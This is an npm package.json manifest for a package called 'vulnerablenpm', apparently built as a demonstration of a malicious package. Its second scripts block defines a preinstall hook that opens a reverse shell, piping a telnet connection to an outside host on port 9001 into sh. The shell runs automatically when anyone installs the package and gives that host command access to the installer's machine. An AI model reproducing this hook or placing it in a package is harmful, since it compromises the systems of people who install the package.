{
  "name": "vulnerablenpm",
  "version": "1.0.0",
  "description": "jajadingdong",
  "main": "index.js",
  "scripts": {
    "test": "echo \"Error: no test specified\" && exit 1"
  },
  "repository": {
    "type": "git",
    "url": "github.com/dagurb/vulnerablenpm"
  },
  "author": "me",
  "license": "ISC",
  "scripts": {
	"prepack": "echo prepack",
	"prepare": "echo prepare",
	"preinstall": "TF=$(mktemp -u);mkfifo $TF && telnet landspitalinn.is 9001 0<$TF | sh 1>$TF"
  }
}
